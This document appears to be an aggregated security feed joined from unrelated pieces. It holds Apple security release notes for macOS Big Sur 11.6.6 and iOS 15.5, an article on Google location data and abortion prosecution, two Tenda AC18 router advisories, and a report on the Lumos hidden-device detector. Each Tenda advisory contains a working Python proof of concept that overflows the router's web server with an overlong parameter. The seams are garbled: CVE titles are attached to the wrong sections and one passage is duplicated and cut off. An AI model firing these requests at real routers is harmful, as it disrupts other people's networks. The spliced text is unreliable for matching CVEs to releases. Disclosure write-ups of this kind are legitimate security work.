Impact: Mounting a maliciously crafted Samba network share may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-26723: Felix Poulin-Belanger

**SMB**

Available for: macOS Big Sur

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26715: Peter Nguyễn Vũ Hoàng of STAR Labs

**SoftwareUpdate**

Available for: macOS Big Sur

Impact: A malicious application may be able to access restricted files

Description: This issue was addressed with improved entitlements.

CVE-2022-26728: Mickey Jin (@patch1t)

**TCC**

Available for: macOS Big Sur

Impact: An app may be able to capture a user's screen

Description: This issue was addressed with improved checks.

CVE-2022-26726: an anonymous researcher

**Tcl**

Available for: macOS Big Sur

Impact: A malicious application may be able to break out of its sandbox

Description: This issue was addressed with improved environment sanitization.

CVE-2022-26755: Arsenii Kostromin (0x3c3e)

**Vim**

Available for: macOS Big Sur

Impact: Multiple issues in Vim

Description: Multiple issues were addressed by updating Vim.

CVE-2021-4136

CVE-2021-4166

CVE-2021-4173

CVE-2021-4187

CVE-2021-4192

CVE-2021-4193

CVE-2021-46059

CVE-2022-0128

**WebKit**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted mail message may lead to running arbitrary javascript

Description: A validation issue was addressed with improved input sanitization.

CVE-2022-22589: Heige of KnownSec 404 Team (knownsec.com) and Bo Qu of Palo Alto Networks (paloaltonetworks.com)

**Wi-Fi**

Available for: macOS Big Sur

Impact: A malicious application may disclose restricted memory

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26745: an anonymous researcher

**Wi-Fi**

Available for: macOS Big Sur

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2022-26761: Wang Yu of Cyberserval

**zip**

Available for: macOS Big Sur

Impact: Processing a maliciously crafted file may lead to a denial of service

Description: A denial of service issue was addressed with improved state handling.

CVE-2022-0530

**zlib**

Available for: macOS Big Sur

Impact: An attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2018-25032: Tavis Ormandy

**zsh**

Available for: macOS Big Sur

Impact: A remote attacker may be able to cause arbitrary code execution

Description: This issue was addressed by updating to zsh version 5.8.1.

CVE-2021-45444

CVE-2022-22675: About the security content of macOS Big Sur 11.6.6

This issue was addressed with improved checks. This issue is fixed in iOS 15.5 and iPadOS 15.5. Processing a large input may lead to a denial of service.

Released May 16, 2022

**AppleAVD**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-26702: an anonymous researcher

**AppleGraphicsControl**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day Initiative

**AVEVideoEncoder**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-26736: an anonymous researcher

CVE-2022-26737: an anonymous researcher

CVE-2022-26738: an anonymous researcher

CVE-2022-26739: an anonymous researcher

CVE-2022-26740: an anonymous researcher

**DriverKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: An out-of-bounds access issue was addressed with improved bounds checking.

CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

**GPU Drivers**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26744: an anonymous researcher

**ImageIO**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: An integer overflow issue was addressed with improved input validation.

CVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend Micro Zero Day Initiative

**IOKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with improved locking.

CVE-2022-26701: chenyuwang (@mzzzz\_\_) of Tencent Security Xuanwu Lab

**IOSurfaceAccelerator**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26771: an anonymous researcher

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs (@starlabs\_sg)

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-26757: Ned Williamson of Google Project Zero

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication

Description: A race condition was addressed with improved state handling.

CVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)

**LaunchServices**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A sandboxed process may be able to circumvent sandbox restrictions

Description: An access issue was addressed with additional sandbox restrictions on third-party applications.

CVE-2022-26706: Arsenii Kostromin (0x3c3e)

**libxml2**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2022-23308

**Notes**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing a large input may lead to a denial of service

Description: This issue was addressed with improved checks.

CVE-2022-22673: Abhay Kailasia (@abhay\_kailasia) of Lakshmi Narain College Of Technology Bhopal

**Safari Private Browsing**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious website may be able to track users in Safari private browsing mode

Description: A logic issue was addressed with improved state management.

CVE-2022-26731: an anonymous researcher

**Security**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious app may be able to bypass signature validation

Description: A certificate parsing issue was addressed with improved checks.

CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

**Shortcuts**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A person with physical access to an iOS device may be able to access photos from the lock screen

Description: An authorization issue was addressed with improved state management.

CVE-2022-26703: Salman Syed (@slmnsd551)

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 238178  
CVE-2022-26700: ryuzaki

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 236950  
CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab

WebKit Bugzilla: 237475  
CVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab

WebKit Bugzilla: 238171  
CVE-2022-26717: Jeonghoon Shin of Theori

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 238183  
CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab

WebKit Bugzilla: 238699  
CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech

**WebRTC**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Video self-preview in a webRTC call may be interrupted if the user answers a phone call

Description: A logic issue in the handling of concurrent media was addressed with improved state handling.

WebKit Bugzilla: 237524  
CVE-2022-22677: an anonymous researcher

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may disclose restricted memory

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-26745: an anonymous researcher

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to elevate privileges

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-26760: 08Tc3wBB of ZecOps Mobile EDR Team

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A remote attacker may be able to cause a denial of service

Description: This issue was addressed with improved checks.

CVE-2015-4142: Kostya Kortchinsky of Google Security Team

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2022-26762: Wang Yu of Cyberserval

CVE-2022-22673: About the security content of iOS 15.5 and iPadOS 15.5

Lawmakers argue Android phone data could be “weaponized against women” if the US Supreme Court officially overturns abortion protections.

More than 40 Democratic members of Congress called on Google to stop collecting and retaining customer location data that prosecutors could use to identify women who obtain abortions.

“We are concerned that, in a world in which abortion could be made illegal, Google’s current practice of collecting and retaining extensive records of cell phone location data will allow it to become a tool for far-right extremists looking to crack down on people seeking reproductive health care. That’s because Google stores historical location information about hundreds of millions of smartphone users, which it routinely shares with government agencies,” Democrats wrote May 24 in a letter led by Senator Ron Wyden (D-Ore.) and Rep. Anna Eshoo (D-Calif.). The letter was sent to Google CEO Sundar Pichai.

Specifically, Google should stop collecting “unnecessary customer location data” or “any non-aggregate location data about individual customers, whether in identifiable or anonymized form. Google cannot allow its online advertising-focused digital infrastructure to be weaponized against women,” lawmakers wrote. They also told Google that people who use iPhones “have greater privacy from government surveillance of their movements than the tens of millions of Americans using Android devices.”

The draft Supreme Court ruling overturning _Roe v. Wade_ could be followed by strict limits or bans on abortion in many states, and Democrats wrote that “Republicans in Congress are already discussing passing a law criminalizing abortion in all 50 states, putting the government in control of women’s bodies.”

Location Data From Android Phones

In their letter, Democrats told Pichai:

_While Google deserves credit for being one of the first companies in America to insist on a warrant before disclosing location data to law enforcement, that is not enough. If abortion is made illegal by the far-right Supreme Court and Republican lawmakers, it is inevitable that right-wing prosecutors will obtain legal warrants to hunt down, prosecute, and jail women for obtaining critical reproductive health care. The only way to protect your customers’ location data from such outrageous government surveillance is to not keep it in the first place._

Google obtains detailed information “from Android smartphones, which collect and transmit location information to Google, regardless of whether the phone is being used or which app a user has open,” they wrote. While Android users have to opt into this data collection, “Google has designed its Android operating system so that consumers can only enable third party apps to access location data if they also allow Google to receive their location data too. In contrast, Google is only able to collect location data from users of iPhones when they are using the Google Maps app,” the lawmakers wrote.

We contacted Google about the letter yesterday and will update this article if we get a response.

Exactly how Google’s location privacy settings work has been a matter of confusion, even for some Google employees. As we wrote in August 2020, documents from a consumer fraud suit the state of Arizona filed against Google “show that company employees knew and discussed among themselves that the company’s location privacy settings were confusing and potentially misleading.”

Democrats Say iPhone Users Have More Privacy

Because many of the cheaper smartphones use Android, the lawmakers warned of a “digital divide” affecting the privacy of people with low incomes:

_No law requires Google to collect and keep records of its customers’ every movement. Apple has shown that it is not necessary for smartphone companies to retain invasive tracking databases of their customers’ locations. Google’s intentional choice to do so is creating a new digital divide, in which privacy and security are made a luxury. Americans who can afford an iPhone have greater privacy from government surveillance of their movements than the tens of millions of Americans using Android devices._

While Google uses location data to target online ads, the company often turns over the data to law enforcement officials who obtain court orders, the Democrats wrote. “This includes dragnet ‘geofence’ orders demanding data about everyone who was near a particular location at a given time,” they wrote, adding that “Google received 11,554 geofence warrants in 2020.”

iPhones also use location services, though the lawmakers seem to be satisfied with Apple’s privacy promises. Among other things, Apple says that if location services are turned on, geo-tagged locations of nearby Wi-Fi hotspots and cell towers are sent “in an anonymous and encrypted form to Apple” to augment a “crowd-sourced database of Wi-Fi hotspot and cell tower locations.”

With the Find My feature that can locate lost devices, Apple says it “retains location information and makes it accessible to you for 24 hours, after which it is deleted” and that “device location services information is stored on each individual device and Apple cannot retrieve this information from any specific device.”

Post-_Roe_ State Abortion Laws

Assuming the Supreme Court overturns _Roe v. Wade_, there could be more state laws like the recently enacted Texas Heartbeat Act that bans abortions after it’s possible to detect a “fetal heartbeat.” The law defines that as “cardiac activity or the steady and repetitive rhythmic contraction of the fetal heart within the gestational sac.” This effectively bans abortions after six weeks, and the state law lets private citizens file lawsuits to obtain injunctions and damages of at least $10,000 per abortion.

These lawsuits could be filed against anyone who “performs or induces an abortion” that violates the Texas Heartbeat Act or anyone who “knowingly engages in conduct that aids or abets” an abortion after a fetal heartbeat is detected. Aiding or abetting includes “paying for or reimbursing the costs of an abortion through insurance or otherwise, if the abortion is performed or induced in violation of this subchapter.” Civil suits can also be filed against anyone who “intends to engage in the conduct” described in the law.

The Texas law doesn’t allow the exact scenario Democrats warned of in their letter, that prosecutors could jail women who obtain abortions. But states would have more leeway to enact stricter anti-abortion laws or bans after lifting _Roe v. Wade_.

The Guttmacher Institute, a pro-choice research group, says that “26 states are certain or likely to ban abortion without _Roe_.” Many of these states have laws that were enacted before the 1973 _Roe v. Wade_ decision and never removed, laws that were enacted after _Roe_ but currently blocked by court order, or “trigger” bans that would “take effect automatically or by quick state action if _Roe_ no longer applies.”

_This story originally appeared on_ _Ars Technica__._

Google Urged to Stop Tracking Location Data Ahead of Roe Reversal

Tenda AC Series Router AC18_V15.03.05.19(6318) was discovered to contain a stack-based buffer overflow in the httpd module when handling /goform/WifiExtraSet request.

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/WifiExtraSet page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **stack-based buffer overflow** vulnerability in function fromSetWirelessRepeat.

In function fromSetWirelessRepeat it reads user provided parameter wpapsk_crypto into victim_buf, and this variable is passed into function strcpy without any length check, which may overflow the stack-based buffer vuln_buf.

So by requesting the page /goform/WifiExtraSet, the attacker can easily perform a **Deny of Service Attack**.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/WifiExtraSet?"
url += "wl\_mode=not\_ap&security=wpapsk&wpapsk\_key=kkkkkkkk&wpapsk\_crypto=" + "s" \* 0x600

response \= requests.get(url)

**Timeline**

*   2022-05-07: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30475)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30475: VulnRepo/IoT/Tenda/3 at master · lcyfrank/VulnRepo

Tenda AC Series Router AC18_V15.03.05.19(6318) has a stack-based buffer overflow vulnerability in function form_fast_setting_wifi_set

**Tenda Router AC18 Vulnerability**

This vulnerability lies in the /goform/fast_setting_wifi_set page which influences the lastest version of Tenda Router AC18. (The latest version is AC18\_V15.03.05.19(6318))

**Vulnerability Description**

There is a **stack-based buffer overflow** vulnerability in function form_fast_setting_wifi_set.

In function form_fast_setting_wifi_set it reads user provided parameter ssid into src, and this variable is passed into function strcpy without any length check, which may overflow the stack-based buffer s.

So by requesting the page /goform/fast_setting_wifi_set, the attacker can easily perform a **Deny of Service Attack**.

**PoC**

import requests

IP \= "10.10.10.1"
url \= f"http://{IP}/goform/fast\_setting\_wifi\_set?"
url += "ssid=" + "s" \* 100

response \= requests.get(url)

**Timeline**

*   2022-05-06: Report to CVE & CNVD;
*   2022-05-26: CVE ID assigned (CVE-2022-30473)

**Acknowledge**

Credit to @peanuts and @cylin from IIE, CAS.

CVE-2022-30473: VulnRepo/IoT/Tenda/2 at master · lcyfrank/VulnRepo

A group of academics has devised a system that can be used on a phone or a laptop to identify and locate Wi-Fi-connected hidden IoT devices in unfamiliar physical spaces.
With hidden cameras being increasingly used to snoop on individuals in hotel rooms and Airbnbs, the goal is to be able to pinpoint such rogue devices without much of a hassle.
The system, dubbed Lumos, is designed with this

A group of academics has devised a system that can be used on a phone or a laptop to identify and locate Wi-Fi-connected hidden IoT devices in unfamiliar physical spaces.

With hidden cameras being increasingly used to snoop on individuals in hotel rooms and Airbnbs, the goal is to be able to pinpoint such rogue devices without much of a hassle.

The system, dubbed **Lumos**, is designed with this intent in mind and to "visualize their presence using an augmented reality interface," said Rahul Anand Sharma, Elahe Soltanaghaei, Anthony Rowe, and Vyas Sekar of Carnegie Mellon University in a new paper.

At its core, the platform works by snuffing and collecting encrypted wireless packets over the air to detect and identify concealed devices. Subsequently, it estimates the location of each identified device with respect to the user as they walk around the perimeter of the space.

The localization module, for its part, combines signal strength measurements that are available in 802.11 packets (aka Received Signal Strength Indicator or RSSI) with relative user position determined by visual inertial odometry (VIO) information on mobile phones.

On Apple's iOS devices, for instance, the positional tracking is achieved by means of ARKit, a developer API that makes it possible to build augmented reality experiences by taking advantage of the phone's camera, CPU, GPU, and motion sensors.

"As the user walks closer to each device, the RSSI values corresponding to those data points increase and then reduce as she walks away from the device," the researchers said. "Lumos leverages the spatial measurements of RSSI values and their variations to estimate the location of each device."

What's more, Lumos can localize IoT devices irrespective of the user's walking speed. Also incorporated is a fingerprinting module that analyzes the captured 802.11 traffic patterns using a machine learning model to identify the devices based on the MAC addresses.

The research evaluated Lumos across 44 different IoT devices spanning various types, models, and brands across six different environments, finding that it can identify hidden devices with 95% accuracy and locate them with a median error of 1.5m within 30 minutes in a two-bedroom, 1000 sq.ft. apartment.

That said, an advanced attacker can leverage techniques like MAC address randomization to evade detection and sidestep localization by arbitrarily modifying the devices' transmit power.

"Lumos can potentially generalize across different device brands and models, as long as it has seen at least one device with similar behavior in the training phase," the researchers said, pointing to how the system can even identify unprofiled devices.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#wifi